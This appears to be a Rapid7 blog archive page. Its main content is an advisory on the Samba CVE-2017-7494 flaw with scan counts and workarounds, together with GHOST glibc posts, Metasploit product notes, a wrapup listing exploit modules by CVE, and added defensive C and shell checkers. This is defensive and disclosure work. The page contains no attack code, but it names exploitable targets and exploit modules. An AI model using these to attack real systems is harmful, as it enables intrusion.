Rapid7 Blog

Linux  

Patching CVE-2017-7494 in Samba: It's the Circle of Life


With the scent of scorched internet still lingering in the air from the WannaCry ransomworm, today we see a new scary-and-potentially-incendiary bug hitting the Twitter news. The vulnerability, CVE-2017-7494, affects versions 3.5 (released March 1, 2010) and onwards of Samba, the de facto standard for providing Windows-based file and print services on Unix and Linux systems. Check out Samba's advisory for more details. We strongly recommend that security and IT teams take immediate action to protect themselves.

Who is affected?

Many home and corporate network storage systems run Samba, and it is frequently installed by default on many Linux systems, making it possible that some users are running Samba without realizing it. Given how easy it is to enable Samba on Linux endpoints, even devices requiring it to be manually enabled will not necessarily be in the clear. Samba makes it possible for Unix and Linux systems to share files the same way Windows does.

While the WannaCry ransomworm impacted Windows systems and was easily identifiable, with clear remediation steps, the Samba vulnerability will impact Linux and Unix systems and could present significant technical obstacles to obtaining or deploying appropriate remediations. These obstacles will most likely present themselves where devices are unmanaged by typical patch deployment solutions or don't allow OS-level patching by the user. As a result, we believe those systems may be likely conduits into business networks.

How bad is it?

The internet is not on fire yet, but there's a lot of potential for it to get pretty nasty. If a vulnerable version of Samba is running on a device and a malicious actor has access to upload files to that machine, exploitation is trivial. In a Project Sonar scan run today, Rapid7 Labs discovered more than 104,000 internet-exposed endpoints that appear to be running vulnerable versions of Samba on port 445. Of those, almost 90% (92,570) are running versions for which there is currently no direct patch available. In other words, “We're way beyond the boundary of the Pride Lands.” (Sorry, we promise that's the last Lion King reference. Maybe.)

We've been seeing a significant increase in malicious traffic to port 445 since May 19th; however, the recency of the WannaCry vulnerability makes it difficult for us to attribute this directly to the Samba vulnerability. It should be noted that proof-of-concept exploit code has already appeared on Twitter, and we are seeing Metasploit modules making their way into the community. We will continue to scan for potentially vulnerable endpoints and will provide an update on numbers in the next few days.

RESEARCH UPDATE – 5/25/17 – We have now run a scan on port 139, which also exposes Samba endpoints, and found very similar numbers to those for the scan of port 445. On port 139, we found approximately 110,000 internet-exposed endpoints running vulnerable versions of Samba. Of these, about 91% (99,645) are running older, unsupported versions of Samba (pre-4.4).

What should you do to protect yourself?

The makers of Samba have provided a patch for versions 4.4 onwards. A workaround for unsupported and vulnerable older versions (3.5.x to 4.4.x) is available, and that same workaround can also be used for supported versions that cannot upgrade. We also recommend that users of older, affected versions upgrade to a more recent, supported version of Samba (4.4 or later) and then apply the available patch.

Organizations should review their official asset and configuration management systems to immediately identify vulnerable systems, and then perform comprehensive and regular full network vulnerability scans to identify misconfigured or rogue systems. Additionally, organizations should review their firewall rules to ensure that SMB/Samba network traffic is not allowed directly from the internet to their assets.

Many network-attached storage (NAS) environments are used as network backup systems. A direct attack or worm would render those backups almost useless, so if patching cannot be done immediately, we recommend creating an offline copy of critical data as soon as possible. In addition, organizations should monitor all internal and external network traffic for increases in connections or connection attempts to Windows file sharing protocols.

How can Rapid7 help?

We are working on checks for Rapid7 InsightVM and Rapid7 Nexpose so customers can scan their environments for vulnerable endpoints and take mitigating action as quickly as possible. We also expect a module in the Metasploit Framework very soon, enabling security professionals to test the effectiveness of their mitigations and understand the potential impact of exploitation. We will notify users as soon as these solutions are available.

PRODUCT UPDATE – 5/25/17 – We have authenticated checks available for Samba CVE-2017-7494 in Rapid7 InsightVM and Rapid7 Nexpose. The authenticated checks relate to vendor-specific fixes as follows:

- ubuntu-cve-2017-7494
- debian-cve-2017-7494
- freebsd-cve-2017-7494
- oracle_linux-cve-2017-7494
- redhat_linux-cve-2017-7494
- suse-cve-2017-7494

PRODUCT UPDATE 2 – 5/25/17 – We now have both authenticated and unauthenticated remote checks in Rapid7 InsightVM and Rapid7 Nexpose. In the unauthenticated case we use anonymous or guest login to gather the required information; on systems that are hardened against that kind of login, the authenticated remote check is available.

Not a Rapid7 customer? Scan your network with InsightVM to understand the impact this vulnerability has on your organization. We also have a step-by-step guide on how to scan for Samba CVE-2017-7494 using our vulnerability scanners.

PRODUCT UPDATE 3 - 5/25/17 - We now have a Metasploit module available for this vulnerability, so you can see whether you can be exploited via Samba CVE-2017-7494 and understand the impact of such an attack. Download Metasploit to try it out.

P.S. Yes, we know the lion is called Simba. But who doesn't love a gratuitous and tenuous cartoon lion reference?! Rowr.
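As an added example that is not part of the original post and not Samba's own code, the following C program shows the two checks a defender would script first for this advisory: placing a reported Samba version in the affected, fixed, or workaround-only ranges described above, and confirming that the advisory's workaround, "nt pipe support = no" in the [global] section of smb.conf, is actually in effect. The fixed release numbers (4.4.14, 4.5.10 and 4.6.4) come from the Samba advisory rather than from this post, and the smb.conf snippets are constructed for the example. One caveat: distribution packages often backport the fix without changing the upstream version number, so treat a version-string match as a prompt to consult the package changelog or the vendor-specific checks listed above, not as a final verdict.

```c
/* Added example (not Rapid7's or the Samba project's code): CVE-2017-7494 audit helpers.
 * classify() places a Samba version in the affected / fixed / workaround-only ranges and
 * workaround_present() checks an smb.conf for the advisory's mitigation
 * "nt pipe support = no" in [global]. The fixed releases (4.4.14, 4.5.10, 4.6.4) are
 * taken from the Samba advisory, not from the post. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

struct ver { int major, minor, patch; };

enum samba_state {
    SAMBA_UNKNOWN,             /* version string could not be parsed */
    SAMBA_NOT_AFFECTED,        /* before 3.5.0, or 4.7.0 and later */
    SAMBA_FIXED,               /* supported branch at or above its fixed release */
    SAMBA_UNPATCHED_SUPPORTED, /* supported branch below its fixed release: patch it */
    SAMBA_UNSUPPORTED          /* 3.5.x to 4.3.x: no vendor patch; workaround or upgrade */
};

static const struct ver FIRST_AFFECTED = { 3, 5, 0 };
static const struct ver FIXED[] = { { 4, 4, 14 }, { 4, 5, 10 }, { 4, 6, 4 } };

/* Accepts "4.4.13", "4.6.4-Ubuntu" and the like; only major.minor.patch is used. */
static int parse_version(const char *s, struct ver *v) {
    return sscanf(s, "%d.%d.%d", &v->major, &v->minor, &v->patch) == 3;
}

static int cmp(struct ver a, struct ver b) {
    if (a.major != b.major) return a.major - b.major;
    if (a.minor != b.minor) return a.minor - b.minor;
    return a.patch - b.patch;
}

enum samba_state classify(const char *version) {
    struct ver v = { 0, 0, 0 };
    if (!parse_version(version, &v)) return SAMBA_UNKNOWN;
    if (cmp(v, FIRST_AFFECTED) < 0) return SAMBA_NOT_AFFECTED;
    if (v.major > 4 || (v.major == 4 && v.minor > 6)) return SAMBA_NOT_AFFECTED;
    for (size_t i = 0; i < sizeof FIXED / sizeof FIXED[0]; i++)
        if (v.major == FIXED[i].major && v.minor == FIXED[i].minor)
            return cmp(v, FIXED[i]) >= 0 ? SAMBA_FIXED : SAMBA_UNPATCHED_SUPPORTED;
    return SAMBA_UNSUPPORTED;
}

/* Lower-case, trim, and collapse whitespace runs to a single space, in place. */
static void normalize(char *s) {
    char *out = s, *in = s;
    int pending = 0;
    while (isspace((unsigned char)*in)) in++;
    for (; *in; in++) {
        if (isspace((unsigned char)*in)) { pending = 1; continue; }
        if (pending) { *out++ = ' '; pending = 0; }
        *out++ = (char)tolower((unsigned char)*in);
    }
    *out = '\0';
}

/* Returns 1 when the [global] section sets "nt pipe support" to a false value. */
int workaround_present(const char *conf) {
    char line[512];
    int in_global = 0;
    for (const char *p = conf; *p; ) {
        size_t full = strcspn(p, "\n");
        size_t n = full < sizeof line ? full : sizeof line - 1;
        memcpy(line, p, n);
        line[n] = '\0';
        p += full + (p[full] == '\n');
        normalize(line);
        if (line[0] == '\0' || line[0] == '#' || line[0] == ';') continue; /* blank or comment */
        if (line[0] == '[') { in_global = strcmp(line, "[global]") == 0; continue; }
        if (!in_global) continue;
        char *eq = strchr(line, '=');
        if (!eq) continue;
        *eq = '\0';
        char *key = line, *val = eq + 1;
        size_t kl = strlen(key);
        while (kl && key[kl - 1] == ' ') key[--kl] = '\0';
        while (*val == ' ') val++;
        if (strcmp(key, "nt pipe support") == 0 &&
            (strcmp(val, "no") == 0 || strcmp(val, "false") == 0 || strcmp(val, "0") == 0))
            return 1;
    }
    return 0;
}

/* Constructed sample configurations: a default share, and the same with the workaround. */
const char SMB_CONF_DEFAULT[] =
    "[global]\n   workgroup = WORKGROUP\n\n[share]\n   path = /srv/share\n   writable = yes\n";
const char SMB_CONF_MITIGATED[] =
    "[global]\n   workgroup = WORKGROUP\n   ; CVE-2017-7494 workaround\n   NT Pipe Support = No\n"
    "\n[share]\n   path = /srv/share\n";

int main(void) {
    static const char *label[] = { "unknown", "not affected", "fixed",
        "unpatched (vendor patch available)", "unsupported (apply workaround or upgrade)" };
    const char *samples[] = { "4.6.4", "4.4.13-Ubuntu", "3.6.25", "4.7.0" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("Samba %-14s -> %s\n", samples[i], label[classify(samples[i])]);
    printf("default smb.conf:   workaround present = %d\n", workaround_present(SMB_CONF_DEFAULT));
    printf("mitigated smb.conf: workaround present = %d\n", workaround_present(SMB_CONF_MITIGATED));
    return 0;
}
```

The version string is whatever the package manager or "smbd --version" reports on the host; the configuration check reads the file text, so it can be pointed at the output of a testparm run or at smb.conf itself. Keys and values are compared case-insensitively with whitespace collapsed because Samba accepts "NT Pipe Support = No" and "nt pipe support=no" alike.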

Live Vulnerability Monitoring with Agents for Linux...and more


A few months ago, I shared news of the release of the macOS Insight Agent. Today, I'm pleased to announce the availability of the Linux Agent within Rapid7's vulnerability management solutions. The arrival of the Linux Agent completes the trilogy that Windows and macOS began in late 2016. For Rapid7 customers, all that really matters is that you've got new capabilities to add to your kit.

Introducing Linux Agents

Take advantage of the Linux Agent to:

- Get a live view into your exposures: automatically collect data from your endpoints and seamlessly update your Liveboards, which are always populated with real-time data without the need to hit refresh or rescan.
- Get visibility into remote workers: remote workers rarely, or in some cases never, connect to the corporate network and often miss scheduled scan windows. Our lightweight agents can be deployed to monitor risks posed by the mobile workforce.
- Eliminate restricted-asset blind spots: some assets are just too critical to the business to be actively scanned. With our agents, you'll get visibility into assets with strict vulnerability scanning restrictions, while removing the need to manage credentials to gain access.
- Get visibility into elastic or ephemeral assets by building the Insight Agent into your base machine images or VM templates.

Of course, Linux isn't a monolithic OS like Windows or macOS. In order for our customers to get the widest possible coverage, Linux Insight Agents support an array of distributions:

- Debian 7.0 - 8.2
- CentOS 5.2 - 7.3
- Red Hat Enterprise Linux (RHEL) Client 5.2 - 7.3
- Red Hat Enterprise Linux (RHEL) Server 5.2 - 7.3
- Red Hat Enterprise Linux (RHEL) Workstation 5.2 - 7.3
- Oracle Enterprise Linux (OEL) Server 5.2 - 7.3
- Ubuntu 11.04 - 16.10
- Fedora 17 - 25
- SUSE Linux Enterprise Server (SLES) 11 - 12
- SUSE Linux Enterprise Desktop (SLED) 11 - 12
- openSUSE LEAP (42.1 - 42.2)
- Amazon Linux

With such a diverse list, we hope you're able to find a match for your environment. Ready to get started? Check out the steps to download and install, and you'll be up and running in no time.

...and more

If you've read this far, you may be wondering: “Hey, what about the ‘...and more’ promised in the title?” Since the release of Insight Agents for vulnerability management in late 2016, we've received great feedback from our customers. In particular, we heard that customers liked the visibility they were able to attain, but found the management capabilities lacking. With our most recent release, we've now brought management capabilities to your Assets with Agents. You can now treat your Assets with Agents just like any other asset in your system. You are now able to:

- Add Assets with Agents to groups
- Tag Assets with Agents
- Run standard reporting from the Console on Assets with Agents
- Correlate using Asset Linking
- Apply vulnerability exceptions

All of your Assets with Agents will be synchronized from the Insight Platform into an automatically created “Rapid7 Insight Agents” site, so you'll always know where to find them.

I hope you grab a moment to give these new tools a spin and let us know what you think! All of our innovations are built side-by-side with our customers through the Rapid7 Voice program. Please contact your Rapid7 CSM or sales representative if you're interested in helping us make our products better. Download a free 30-day trial of InsightVM.

Now Officially Supporting Kali Linux 2.0


In August, we were getting a lot of questions about Kali 2. I answered some of those questions in the Metasploit on Kali Linux 2.0 blog post. Today, I am pleased to announce that we are extending our official platform support to three new operating systems, which are now listed on the Metasploit System Requirements page:

- Kali Linux 2.0
- Red Hat Enterprise Server 7.1 or later
- Microsoft Windows Server 2012 R2

Since we have added Kali 2 as a supported operating system, we no longer support Kali 1.x. Please note that these changes apply to our closed source products, which are Metasploit Community, Express, and Pro. Since Metasploit Framework is an open source and free tool, we do not provide support for it.

Let me now try to cover some frequently asked questions:

What is the difference between Rapid7 officially supported and unsupported platforms?

For every platform we list on our Metasploit System Requirements page, we perform automated testing before every release. Additionally, we perform full regression tests if we introduce a new feature. This ensures that we minimize the chance of introducing a defect. Besides testing, we have a lab environment that includes each of the supported platforms, so that when our customers report any issues, we can quickly reproduce and address them. For these reasons, we highly recommend that you use a supported platform.

Kali 2 already comes with Metasploit Framework, how does this change affect me?

This announcement is only applicable to our closed source products, which are Metasploit Community, Express, and Pro. Since Framework is an open source tool, we do not provide support for Metasploit Framework; however, you may still receive community support via the IRC channel and Rapid7 Community Discussions. Additionally, we have recently released Metasploit Framework Open Source Installers. If you wish to always stay on an updated version of Metasploit Framework, feel free to use the open source installers.

Kali 2 already comes with Metasploit Framework, can I still install Community, Express or Pro editions?

Yes, Kali 2 comes with a Metasploit Framework version; however, you can still install any of our closed source editions of Metasploit without any issues. As I mentioned above, Express and Pro editions are now fully supported on Kali 2. Once you install the Community, Express, or Pro edition, you will notice that the packages install into a completely different path, so they will not overwrite the Kali-provided Framework edition. You will still be able to use the command line provided with the Pro edition without issues.

Can I continue to use Kali 1.1?

If you wish to continue using Kali 1.1, you certainly can. Please keep in mind that it is no longer supported and we do not perform tests on this platform anymore, so it is quite possible that some things may not work as expected.

I have further questions, what do I do?

Feel free to comment on this thread, or send us a tweet.

Eray Yilmaz - @erayymz
Sr. Product Manager

Metasploit Framework Open Source Installers


Rapid7 has long supplied universal Metasploit installers for Linux and Windows. These installers contain both the open source Metasploit Framework and commercial extensions, which include a graphical user interface, metamodules, wizards, social engineering tools and integration with other Rapid7 tools. While these features are very useful, we recognized that they are not for everyone. According to our recent survey of Metasploit Community users, most only used it for the open source components, preferring the command-line tools over the graphical ones. Also, while we do our best to ensure that Metasploit Community and Pro releases are of high quality, they are not always supplied with the latest hot new exploits and payloads available in Metasploit Framework.

While it has always been possible to simply set up a development environment and run the latest metasploit-framework code from GitHub directly, it can still be tricky to set up and keep up to date. Kali Linux 2.0 now publishes the open source pieces of Metasploit Framework with its distribution, but the release schedule still follows that of the Metasploit Community / Pro editions, and it of course does not necessarily help those who prefer other operating systems.

To address the needs of open source enthusiasts, those needing more frequent updates, or those simply looking for an easy way to set up a database for Metasploit Framework development use, we have created open source installers for Metasploit Framework for Windows, OS X and Linux x86 and x86-64 platforms. These installers use the Omnibus tool from Chef to package everything needed to run Metasploit Framework, from dependent libraries and specific Ruby versions up to a built-in PostgreSQL database. The installers are easy to install and get up and running in seconds. They are also built and tested automatically each night, so you can always run 'msfupdate' and get the latest exploits and payloads without having to set up a development environment. The installers also integrate with your OS's native package manager, be it RPM- or DEB-based on Linux, MSI for Windows or PKG for OS X. That makes them easy to uninstall as well.

For information about how to install and use these new packages, see the wiki page on the Metasploit Framework GitHub project. The installers themselves are also open source, so if you see a problem, pull requests or issue reports are very welcome!

Note that in addition to these Metasploit-specific installers, there are other ways to get Metasploit Framework, such as through Dave Kennedy's PenTester Framework or even pre-installed in Kali Linux. The Metasploit Framework omnibus installers provide another way to get the open source Metasploit Framework running on a variety of platforms quickly and easily.

Metasploit on Kali Linux 2.0


As you are aware, Kali 2.0 was released this week and is getting quite a bit of attention, as it should. The folks behind Kali have worked really hard to bring you the new version of Kali Linux that everyone is excited about. If you have already started to play with the new version, you have probably realized that something is different: Metasploit Community / Pro is no longer installed by default.

Where is Metasploit Community / Pro in Kali 2.0?

Currently Kali 2.0 does not include the commercial editions of Metasploit, which are the Community, Express and Pro versions. Kali 2.0 includes, by default, a version of Metasploit Framework.

Why doesn't Kali 2.0 include Metasploit Community / Pro?

Kali 2.0 is not yet officially supported by Rapid7 for our commercial versions of Metasploit. A lot changed in Kali 2.0, so we need to make sure our commercial editions work as expected on the new Kali platform. We are working towards adding Kali 2.0 support soon.

How can I install Metasploit Community / Pro on Kali 2.0?

If you would like to install the latest version of the Metasploit Community, Express, or Pro edition, you can absolutely do that by downloading the latest installer from GitHub: Metasploit Installers. Once you download the installer, please follow the normal install procedure. We have verified that the latest installer will install and Metasploit will run without issues; however, I must remind you that Kali 2.0 is not yet officially supported by Rapid7.

Do I need to uninstall the pre-installed Metasploit Framework?

Due to the way we package commercial versions, installing Metasploit Community, Express, or Pro will not overwrite any Metasploit Framework packages provided by the base install of Kali 2.0. Thus, it is not required to uninstall the Kali-provided Metasploit Framework packages.

What if I upgrade from Kali 1.1 to 2.0?

At this point, if you are planning on using any commercial edition of Metasploit on Kali 2.0, we strongly recommend a fresh install of Kali.

I have further questions, what do I do?

Feel free to comment on this thread, or send us a tweet.

One last thing: because we have no call-home functions in any Metasploit version, it is really hard for us to know which version of Metasploit is being used on Kali. So please take this one-question survey to let us know which version of Metasploit you use on Kali. We really appreciate your response.

Eray Yilmaz - @erayymz
Sr. Product Manager

Weekly Metasploit Wrapup: Tons of Blogs, Kali Dev, and Nothing Suspicious Here


Blogsplosion! If you've been following along, you'll have noticed that we published just about a post a day here this week, which makes my job of bringing the weekly update to you, dear reader, that much easier. So, I'll keep this week's update pretty short. Here's a link farm covering what was discussed by Joe, OJ, sinn3r, and HD. They're all really fun and informative reads from fun and informative people, as you'd expect.

- Mozilla Firefox Proxy Prototype RCE: Joe discusses a remote code execution vulnerability in Mozilla Firefox versions 31 through 34.
- Using Host Tagging in Metasploit for Penetration Testing: sinn3r discusses a new-to-Framework feature that makes host tagging on engagements significantly easier from the console.
- Deep Dive Into Stageless Meterpreter Payloads: OJ discusses the new stageless Meterpreter payloads, and why you might want to pick those rather than traditionally staged Meterpreter.
- Meterpreter Survey 2015: HD discusses the results of the Meterpreter survey held in February, where we're going with payload development, and what you can do to help.
- Unicode Support in Meterpreter: Brent discusses the storied history of character encoding, and why you needn't care about it any more in Meterpreter sessions.

Kali Dev Docs

Also this week, we're deepening our commitment to the Kali Linux user community by overhauling our Metasploit Development Environment Setup docs. If you're a habitual Kali hacker, we now have a pretty well documented means to get you up to speed with a modern Metasploit dev environment. It's been a long time coming, and replaces the old http://r-7.co/MSF-DEV wiki completely. Once the tires are sufficiently kicked on this collection of copy-pasta bashisms, we're going to get it all nicely packaged up as one of those new-fangled DevOpsish deploy scripts, and it should work for pretty much any Debian-based distribution.

No, it's not a DNS Hijack

Finally, if all goes well over the next few days, you should see an entirely new platform for all our bloggery, discussion boards, and shameless trolling. You can see the note from Community Manager Maria Varmazis on the welcome page today. I'm pretty excited about the move, scheduled for March 31, 2015. What this all means for you is, when you get the password reset message from rapid7.com, you can rest assured that it's (probably) not a phishing attempt, a DNS hijack, or a timezone-agnostic April Fool's joke. It's really us, I swear. I mean, what's more convincing than an unsigned, unauthenticated, unsolicited reset request, pointing to a website that's running an entirely different backend from what you're accustomed to? Totes legit. (:

In an effort to assure you that this is a real change and not a trick, I have signed this statement over on GitHub with my public key (as asserted by keybase.io). Feel free to verify it with your favorite GPG/PGP signature authentication scheme -- try curl that-raw-gist-link | gpg --verify. Of course, maybe this is all part of the ruse. There is really no end to paranoia, if you care to delve deep enough.

New Modules

Since the last Wrapup (diffs here), we have nine new modules: five exploits and four Post/Aux modules. Note that we've also renamed five WordPress-based exploit modules, so I've added those to a special section, since they will also appear to be "new." If you're using those in a scripted way, like a resource script or Task Chain or something, you'll want to update your script to pick up the new names. Otherwise, they're unchanged.

Exploit modules

- Belkin Play N750 login.cgi Buffer Overflow by Marco Vaz and Michael Messner exploits CVE-2014-1635
- Exim GHOST (glibc gethostbyname) Buffer Overflow by Qualys, Inc. exploits CVE-2015-0235
- Firefox Proxy Prototype Privileged Javascript Injection by joev exploits CVE-2014-8636
- Powershell Remoting Remote Command Execution by Ben Campbell exploits CVE-1999-0504

Auxiliary and post modules

- WordPress WP EasyCart Plugin Privilege Escalation by Rob Carr exploits CVE-2015-2673
- WordPress WPLMS Theme Privilege Escalation by Evex and Rob Carr
- GitLab Login Utility by Ben Campbell
- GitLab User Enumeration by Ben Campbell
- Symantec Web Gateway Login Utility by sinn3r

Renamed modules

- WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution by Sammy FORGIT and patrick exploits BID-53805
- Wordpress InfusionSoft Upload Vulnerability by g0blin and us3r777 exploits CVE-2014-6446
- WordPress cache_lastpostdate Arbitrary Code Execution by hdm and str0ke exploits CVE-2005-2612
- WordPress OptimizePress Theme File Upload Vulnerability by Mekanismen and United of Muslim Cyber Army
- WordPress W3 Total Cache PHP Code Execution by juan vazquez, hdm, Christian Mehlmauer, and Unknown exploits CVE-2013-2010

GHOSTbuster: How to scan just for CVE-2015-0235 and keep your historical site data


A recently discovered severe vulnerability, nicknamed GHOST, can result in remote code execution on vulnerable systems. Affected systems should be patched and rebooted immediately. Learn more about CVE-2015-0235 and its risks.

The Nexpose 5.12.0 content update provides coverage for the GHOST vulnerability. Once the Nexpose 5.12.0 content update has been applied, built-in vulnerability scans will include checks for CVE-2015-0235. If you have regular scans set up to cover your network, they will now check for this vulnerability. Note that the Nexpose 5.12.0 product update is not required to scan for GHOST; the content update alone is sufficient.

As of the Nexpose 5.12.0 product update, you can scan an existing site with a different template and still keep the data from previous scans. If you need to determine as quickly as possible whether your assets are vulnerable to GHOST, you can create a scan template that focuses your scan on CVE-2015-0235 to the exclusion of anything else. Nexpose will check only for this vulnerability with this scan, but will retain data from previous scans about whether your assets were vulnerable to other exploits.

To create the custom GHOST scan template, after the 5.12.0 update, take the following steps:

1. Create a custom scan template. In the Web interface, in the Sites section, click Edit to open the site configuration for the site you want to scan.
2. On the Authentication tab, ensure the site is authenticating with Secure Shell (SSH). For guidance on permission elevation, see Elevating scan credentials in the Configuring scan credentials section of the Nexpose Help or User's Guide.
3. In the Site Configuration, go to the Templates tab. In the Select Scan Template section, find the Full audit without Web Spider template, hover the mouse in the Copy column, and select the Copy icon. The Scan Template Configuration opens.
4. Ensure the Vulnerabilities option is selected. Clear the Policies option.
5. Edit the scan template name and description so you will be able to recognize later that the template is customized for CVE-2015-0235.
6. Limit service discovery to port 22: in the Service Discovery section, set Ports to scan to Custom (only use “Additional ports”) and specify 22 for Additional ports.
7. Limit host discovery to port 22: in the Asset Discovery section, specify only 22 for Send TCP Packets to ports and clear the checkbox for Send UDP packets to ports. The Send ICMP “pings” option can be set or not, without a major performance impact either way.
8. Select only the relevant vulnerability checks. Go to the Vulnerability Checks page. First, disable all checks, check categories, and check types so that you can focus on scanning exclusively for CVE-2015-0235:
   - Expand the By Category section and click Remove categories. Select the check box for the top row (Vulnerability Category), which will auto-select the check boxes for all categories. Then click Save. Note that 0 categories are now enabled.
   - Expand the By Check Type section and click Remove check types. Select the check box for the top row (Vulnerability Check Type), which will auto-select the check boxes for all types. Then click Save. Note that 0 check types are now enabled.
   - Expand the By Individual Check section and click Add checks. Enter or paste CVE-2015-0235 in the Search Criteria box and click Search. Select the check box for the top row (Vulnerability Check), which will auto-select the check boxes for all listed checks. Then click Save.
9. Save the scan template.

Schedule your scan

1. In the Schedule tab, select Create Schedule.
2. Ensure that Enable Schedule is checked.
3. Specify a start time and date; to get started right away, specify the current date and a time a few minutes in the future.
4. Select your new scan template.
5. If you only want to run this scan once, clear the Repeat scan every checkbox.
6. Click Save.

Once your scan has run, you will see the results of all scans in the scan history for the site. The vulnerabilities and risk score for each asset will reflect the most recent check for a given vulnerability, giving you a thorough picture of your risk based on this specific scan and your historical scans of that site. You can create a report specific to the GHOST vulnerability so you can focus your remediation. Learn more and get the queries needed to create the report on this page.

GHOST in the Machine - Is CVE-2015-0235 another Heartbleed?


CVE-2015-0235 is a remote code execution vulnerability affecting Linux systems using older versions of the GNU C Library (glibc versions less than 2.18). The bug was discovered by researchers at Qualys and named GHOST in reference to the _gethostbyname function (and possibly because it makes for some nice puns). To be clear, this is NOT the end of the Internet as we know, nor is it further evidence (after Stormaggedon) that the end of the world is nigh. It's also not another Heartbleed. But it is potentially nasty and you should patch and reboot your affected systems immediately. What's affected? Linux-based appliances from a variety of vendors are going to be impacted, though as with most library-level vulnerabilities, the attack surface is still largely unknown. If you use Linux-based appliances, check with your vendor to determine whether an update is available and needs to be applied. glibc is a core component of Linux used to implement C libraries. The vulnerability impacts most Linux distributions released between November 10, 2000 and mid-2013. This means that, similarly to Heartbleed, it affects a wide range of applications that happen to call the vulnerable API. The bug was fixed in 2013, but wasn't flagged as a security issue at the time (or since until now), so vendors using older branches of glibc didn't update the library. We recommend that you apply the latest patches available from your vendor and reboot the patched machine. Applying the update without a reboot may leave vulnerable services exposed to the network. How bad is it? Successful exploitation of this vulnerability can result in remote code execution, so it has the potential to be pretty bad. This issue can also be exploited locally in some cases, allowing an unprivileged user to gain additional access. In contrast to a vulnerability like Heartbleed, this issue is not always exploitable. In fact, in a general sense, this is not an easy bug to exploit. 
Only one easily-exploitable case has been identified so far, though that may change as additional information comes to light. The one already identified is the Exim mail server: an attacker could abuse this vulnerability to execute arbitrary commands on an unpatched server.

How can you test for it?

This issue is difficult to test for, as the full attack surface is not yet known. As mentioned, the Exim mail server is one example of a vulnerable service and it is possible to test for the issue remotely, without authentication. In general, we recommend using a credentialed vulnerability scan to identify unpatched systems, since the installed glibc package version can be checked directly, whereas remote checks exist only for specific services such as Exim. Qualys says that they plan to release a Metasploit module targeting the Exim mail server (thank you); however, please note that this exploit depends on a non-default configuration being selected. The Nexpose update (5.12.0) scheduled for release tomorrow (Wednesday, Jan 28) will include a check for this vulnerability in relevant RHEL, CentOS, Ubuntu, Debian and SUSE distributions.

What should you do about it?

Patch immediately and reboot. Without a reboot, services that loaded the old library before the update keep running the vulnerable code. Ubuntu versions newer than 12.04 have already been upgraded to a non-vulnerable glibc library. Older Ubuntu versions (as well as other Linux distributions) are still using older versions of glibc and are either waiting on a patch or a patch is already available.

Are Rapid7 solutions impacted by this?

Our native code does not use the vulnerable function call, so the solutions themselves are not affected. However, if you are running Nexpose on an Ubuntu 12.04-based appliance, the underlying OS is vulnerable; we are investigating whether it can be exploited remotely and will provide an update. Again, we recommend patching immediately, and it's always sensible to ensure systems are not accessible from the public-facing internet unless they have to be. UserInsight used some of the impacted libraries. Again, we know of no way that this could be remotely exploited, but we are redeploying immediately based on a patched version of glibc. If you have any questions about this bug, please let us know. ~ @infosecjen
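The reboot advice is the part that gets skipped, so here is an added example (not from the post, not Rapid7 or Qualys code) of two checks an administrator wants after applying the glibc update: a classifier for the upstream affected range, with the backport caveat spelled out, and a scan of /proc/*/maps for processes still holding a libc that has since been replaced on disk. The maps excerpt in `sample_maps_file` is constructed; the only live probe is `getconf GNU_LIBC_VERSION`.

```shell
#!/bin/sh
# Added example for the GHOST post; not Rapid7's or Qualys' code.
# Two post-patch checks:
#   1. classify a glibc version string against the upstream affected range
#      (2.2 <= version < 2.18). Distributions backport fixes, so a patched
#      RHEL 6 package can still report 2.12: treat "affected" as a hint and
#      confirm against the vendor's package changelog or advisory.
#   2. list running processes whose mapped libc has since been replaced on
#      disk. The kernel appends "(deleted)" to such entries in /proc/PID/maps;
#      those processes keep executing the old library until restarted.

# glibc_version_in_ghost_range VERSION -> "affected", "fixed" or "unknown"
# Accepts "2.17", "2.12-1.149" or "2.19-0ubuntu6"; only MAJOR.MINOR is compared.
glibc_version_in_ghost_range() {
    case "$1" in
        [0-9]*.[0-9]*) ;;
        *) echo unknown; return 0 ;;
    esac
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%[!0-9]*}          # strip "-1.149", "ubuntu6" and so on
    [ -n "$minor" ] || { echo unknown; return 0; }
    if [ "$major" -eq 2 ] && [ "$minor" -ge 2 ] && [ "$minor" -lt 18 ]; then
        echo affected
    else
        echo fixed
    fi
}

# deleted_libc_in_maps MAPSFILE -> unique paths of libc mappings marked (deleted)
deleted_libc_in_maps() {
    # maps fields: address perms offset dev inode pathname [(deleted)]
    # "libc[-.]" matches libc.so.6 and libc-2.17.so but not libcrypto or libcap.
    grep -E '/libc[-.][^ ]* \(deleted\)$' "$1" 2>/dev/null | awk '{ print $6 }' | sort -u
}

# scan_running_processes -> "PID COMM LIBPATH" per process still using a replaced libc
# (only processes whose maps the caller may read; run as root for full coverage)
scan_running_processes() {
    for maps in /proc/[0-9]*/maps; do
        pid=${maps#/proc/}
        pid=${pid%/maps}
        for lib in $(deleted_libc_in_maps "$maps"); do
            comm=$(cat "/proc/$pid/comm" 2>/dev/null || echo '?')
            echo "$pid $comm $lib"
        done
    done
}

# sample_maps_file -> path to a constructed /proc/PID/maps excerpt (example data)
sample_maps_file() {
    f=$(mktemp)
    cat >"$f" <<'EOF'
7f1a00000000-7f1a001c0000 r-xp 00000000 08:01 1311 /lib/x86_64-linux-gnu/libc-2.17.so (deleted)
7f1a001c0000-7f1a003c0000 ---p 001c0000 08:01 1311 /lib/x86_64-linux-gnu/libc-2.17.so (deleted)
7f1a00400000-7f1a00410000 r-xp 00000000 08:01 1400 /lib/x86_64-linux-gnu/libcrypto.so.1.0.1 (deleted)
7f1a00500000-7f1a00520000 r-xp 00000000 08:01 1500 /lib/x86_64-linux-gnu/libpthread-2.17.so
EOF
    echo "$f"
}

main() {
    ver=$(getconf GNU_LIBC_VERSION 2>/dev/null | awk '{ print $2 }')
    echo "installed glibc ${ver:-?}: $(glibc_version_in_ghost_range "${ver:-none}") (upstream range; check vendor backports)"
    echo "processes still mapping a replaced libc (restart them, or reboot):"
    scan_running_processes
}

# Run the live checks only when asked, so sourcing the file just defines the functions.
if [ "${1:-}" = "--live" ]; then main; fi
```

Run it with `--live` after the package update: an empty process list means a reboot is no longer strictly required for GHOST; anything listed (sshd, exim, a database) is still running the old code. The version classifier is deliberately conservative about backports because a package version string cannot tell you whether the vendor backported the fix.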

12 Days of HaXmas: Meterpreter migration for Linux!

